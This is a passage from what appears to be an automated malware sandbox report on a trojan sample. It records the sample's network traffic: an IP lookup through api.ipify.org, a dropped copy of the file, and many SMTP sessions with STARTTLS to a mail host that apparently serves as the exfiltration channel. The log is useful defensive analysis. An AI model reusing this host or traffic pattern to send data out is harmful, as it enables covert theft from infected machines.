                                                      Apr 3, 2024 06:23:13.061412096 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.061697960 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.061805010 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.061923981 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.062040091 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.062169075 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.062294006 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.089771032 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.091515064 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.302129030 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.302150965 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.302263975 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.304433107 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.304670095 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.304836035 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.305191040 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.362755060 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.362771988 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.362783909 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.362796068 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.362871885 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.362871885 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.368660927 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.370137930 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.542011976 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.542732954 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.544194937 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.544651031 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.545418978 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.545597076 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.545994043 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.546164989 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.568511009 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.608221054 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.610337973 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.686456919 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.847192049 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:13.847471952 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:13.918190002 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.090481997 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.090747118 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.163305998 CEST5874974589.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.164288998 CEST49745587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.166281939 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.341145039 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.341373920 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.408082008 CEST5874974889.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.408178091 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.582098961 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.582478046 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.865297079 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.882101059 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:14.950568914 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:14.968626976 CEST5874974889.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:15.137937069 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.272713900 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.273431063 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.352684975 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.377780914 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.378118992 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.440130949 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.518604994 CEST5874974889.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.518621922 CEST5874974889.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.519520044 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.519545078 CEST49748587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.588586092 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.590241909 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.613951921 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.616497040 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.616508961 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.617427111 CEST5874974789.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.617485046 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.617525101 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.617572069 CEST49747587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.680109024 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.680241108 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.848602057 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.851506948 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:18.954503059 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:18.954696894 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.088932991 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.089246988 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.195015907 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.195259094 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.330836058 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.331182957 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.440582991 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.440907955 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.581686020 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.581713915 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.581724882 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.581737995 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.581818104 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.582020044 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.583920956 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.585369110 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.703840971 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.703881979 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.703893900 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.703902006 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.703999996 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.706198931 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.707695007 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.822149992 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:19.822880983 CEST49749587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:19.961569071 CEST5874975089.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:20.012669086 CEST49750587192.168.2.789.249.49.141
                                                      Apr 3, 2024 06:23:20.078020096 CEST5874974989.249.49.141192.168.2.7
                                                      Apr 3, 2024 06:23:20.122047901 CEST49749587192.168.2.789.249.49.141

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Apr 3, 2024 06:19:10.818212032 CEST6458353192.168.2.71.1.1.1
                                                      Apr 3, 2024 06:19:10.964253902 CEST53645831.1.1.1192.168.2.7
                                                      Apr 3, 2024 06:19:12.685530901 CEST6245453192.168.2.71.1.1.1
                                                      Apr 3, 2024 06:19:12.933224916 CEST53624541.1.1.1192.168.2.7
                                                      Apr 3, 2024 06:19:17.031662941 CEST5786053192.168.2.71.1.1.1

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Apr 3, 2024 06:19:10.818212032 CEST192.168.2.71.1.1.10x3c4fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:12.685530901 CEST192.168.2.71.1.1.10x4014Standard query (0)nl9.nlkoddos.comA (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:17.031662941 CEST192.168.2.71.1.1.10xb747Standard query (0)time.windows.comA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Apr 3, 2024 06:19:10.964253902 CEST1.1.1.1192.168.2.70x3c4fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:10.964253902 CEST1.1.1.1192.168.2.70x3c4fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:10.964253902 CEST1.1.1.1192.168.2.70x3c4fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:12.933224916 CEST1.1.1.1192.168.2.70x4014No error (0)nl9.nlkoddos.com89.249.49.141A (IP address)IN (0x0001)false
                                                      Apr 3, 2024 06:19:17.157835007 CEST1.1.1.1192.168.2.70xb747No error (0)time.windows.comtwc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • api.ipify.org

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.749707104.26.12.2054437272C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MulDropNET.68.25303.2606.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-03 04:19:11 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-03 04:19:11 UTC211INHTTP/1.1 200 OK
                                                      Date: Wed, 03 Apr 2024 04:19:11 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 86e6424cb8da67c0-MIA
                                                      2024-04-03 04:19:11 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31
                                                      Data Ascii: 102.129.152.231


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749711104.26.12.2054438128C:\Users\user\AppData\Roaming\tXBTtgndxsp.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-04-03 04:19:15 UTC155OUTGET / HTTP/1.1
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                      Host: api.ipify.org
                                                      Connection: Keep-Alive
                                                      2024-04-03 04:19:15 UTC211INHTTP/1.1 200 OK
                                                      Date: Wed, 03 Apr 2024 04:19:15 GMT
                                                      Content-Type: text/plain
                                                      Content-Length: 15
                                                      Connection: close
                                                      Vary: Origin
                                                      CF-Cache-Status: DYNAMIC
                                                      Server: cloudflare
                                                      CF-RAY: 86e642669800daad-MIA
                                                      2024-04-03 04:19:15 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 33 31
                                                      Data Ascii: 102.129.152.231


                                                      SMTP Packets

                                                      TimestampSource PortDest PortSource IPDest IPCommands
                                                      Apr 3, 2024 06:19:13.422032118 CEST5874970989.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:19:12 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:19:13.423819065 CEST49709587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:19:13.664356947 CEST5874970989.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:19:13.664539099 CEST49709587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:19:13.905740976 CEST5874970989.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:19:16.809438944 CEST5874971289.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:19:15 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:19:16.809633017 CEST49712587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:19:17.050934076 CEST5874971289.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:19:17.051142931 CEST49712587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:19:17.292526007 CEST5874971289.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:20:40.842294931 CEST5874972189.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:39 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:40.842719078 CEST49721587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:20:41.083410025 CEST5874972189.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:20:41.161477089 CEST5874972189.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:20:41.471164942 CEST5874972289.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:40 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:41.702768087 CEST5874972289.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:20:42.055700064 CEST5874972389.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:41 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:42.055856943 CEST49723587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:20:42.297610044 CEST5874972389.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:20:42.300062895 CEST49723587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:20:42.543298960 CEST5874972389.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:20:53.763696909 CEST5874972489.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:52 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:53.763900995 CEST49724587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:20:54.001207113 CEST5874972489.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:20:54.004074097 CEST49724587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:20:54.249077082 CEST5874972489.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:20:54.955811024 CEST5874972589.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:53 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:54.963632107 CEST49725587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:20:55.209804058 CEST5874972589.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:20:55.209933043 CEST49725587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:20:55.451487064 CEST5874972589.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:20:59.583033085 CEST5874972689.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:20:58 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:20:59.583142042 CEST49726587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:20:59.829217911 CEST5874972689.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:20:59.829372883 CEST49726587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:00.072737932 CEST5874972689.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:02.306768894 CEST5874972689.249.49.141192.168.2.7421 Lost incoming connection
                                                      Apr 3, 2024 06:21:02.706996918 CEST5874972789.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:01 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:02.707236052 CEST49727587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:02.950103045 CEST5874972789.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:02.953672886 CEST49727587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:03.190023899 CEST5874972789.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:11.144781113 CEST5874972889.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:10 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:11.144891977 CEST49728587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:11.387613058 CEST5874972889.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:11.401767969 CEST49728587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:11.654751062 CEST5874972889.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:18.358355045 CEST5874972989.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:17 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:18.358547926 CEST49729587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:18.592735052 CEST5874972989.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:18.593014956 CEST49729587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:18.827373028 CEST5874972989.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:31.607357979 CEST5874973089.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:30 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:31.607482910 CEST49730587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:31.846719980 CEST5874973089.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:31.923715115 CEST5874973089.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:21:32.231462955 CEST5874973189.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:31 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:32.237523079 CEST49731587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:32.473522902 CEST5874973189.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:32.477647066 CEST49731587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:32.714142084 CEST5874973189.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:34.873820066 CEST5874973189.249.49.141192.168.2.7421 Lost incoming connection
                                                      Apr 3, 2024 06:21:35.182163954 CEST5874973289.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:34 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:35.187524080 CEST49732587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:35.427809954 CEST5874973289.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:35.427937984 CEST49732587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:35.668060064 CEST5874973289.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:47.234597921 CEST5874973389.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:46 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:47.234714031 CEST49733587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:47.481532097 CEST5874973389.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:47.481700897 CEST49733587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:47.725208044 CEST5874973389.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:52.956640005 CEST5874973489.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:51 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:52.957648039 CEST49734587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:53.237407923 CEST5874973489.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:53.237588882 CEST49734587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:53.473179102 CEST5874973489.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:21:57.265222073 CEST5874973589.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:21:56 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:21:57.265449047 CEST49735587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:21:57.503799915 CEST5874973589.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:21:57.503978014 CEST49735587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:21:57.742512941 CEST5874973589.249.49.141192.168.2.7220 TLS go ahead
                                                      Apr 3, 2024 06:22:00.643268108 CEST5874973589.249.49.141192.168.2.7421 nl9.nlkoddos.com lost input connection
                                                      Apr 3, 2024 06:22:01.048466921 CEST5874973689.249.49.141192.168.2.7220-nl9.nlkoddos.com ESMTP Exim 4.96.2 #2 Wed, 03 Apr 2024 06:22:00 +0200
                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                      220 and/or bulk e-mail.
                                                      Apr 3, 2024 06:22:01.055546045 CEST49736587192.168.2.789.249.49.141EHLO 768287
                                                      Apr 3, 2024 06:22:01.291848898 CEST5874973689.249.49.141192.168.2.7250-nl9.nlkoddos.com Hello 768287 [102.129.152.231]
                                                      250-SIZE 52428800
                                                      250-8BITMIME
                                                      250-PIPELINING
                                                      250-PIPECONNECT
                                                      250-STARTTLS
                                                      250 HELP
                                                      Apr 3, 2024 06:22:01.292061090 CEST49736587192.168.2.789.249.49.141STARTTLS
                                                      Apr 3, 2024 06:22:01.536792040 CEST5874973689.249.49.141192.168.2.7220 TLS go ahead
